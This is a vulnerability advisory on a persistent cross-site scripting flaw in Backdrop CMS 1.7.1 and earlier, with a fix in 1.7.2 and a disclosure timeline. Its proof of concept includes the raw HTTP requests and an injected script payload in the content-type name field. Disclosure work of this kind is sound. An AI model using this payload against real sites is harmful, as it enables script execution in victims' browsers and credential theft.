============================================= MGC ALERT 2017-005 - Original release date: July 11, 2017 - Last revised: August 18, 2017 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting II. BACKGROUND ------------------------- Backdrop CMS is a simple, lightweight, and easy to use Content Management System used to build attractive, professional websites. III. DESCRIPTION ------------------------- Has been detected a Persistent XSS vulnerability in Backdrop CMS, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT ------------------------- Go to: Structure -> Content types -> Add content type And post: POST /backdrop/admin/structure/types/add HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 605 Referer: http://127.0.0.1/backdrop/admin/structure/types/add Cookie: Backdrop.tableDrag.showWeight=0; PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en; phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=120.60.120%257C%252F%257C; nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D; nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean; SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo Connection: close Upgrade-Insecure-Requests: 1 name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&type=test_script_alert&description=&title_label=Demo&help=&status_default=1&sticky_enabled=1&promote_enabled=1&path_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D&revision_enabled=1&node_submitted=1&node_user_picture=1&comment_default=2&comment_per_page=50&comment_mode=1&comment_user_picture=1&comment_form_location=1&comment_preview=1&additional_settings__active_tab=&form_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA&form_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4&form_id=node_type_form&op=Save+and+add+fields The variable "name" it is not sanitized, later, if you go to the content type created and click in "Manage Displays" GET /backdrop/admin/structure/types/manage/test-script-alert/display HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate The XSS is executed, in the response you can view: Manage display Customized for test"> V. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED ------------------------- Backdrop CMS <= 1.7.1 VII. SOLUTION ------------------------- Install the last release: https://github.com/backdrop/backdrop/releases/tag/1.7.2 VIII. REFERENCES ------------------------- https://backdropcms.org/security/backdrop-sa-core-2017-009 IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- July 11, 2017 1: Initial release August 18, 2017 2: Last revision XI. DISCLOSURE TIMELINE ------------------------- July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas July 11, 2017 2: Send to vendor August 17, 2017 3: Vendo fix in 1.7.2 version August 18, 2017 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester # Iranian Exploit DataBase = http://IeDb.Ir [2017-09-01]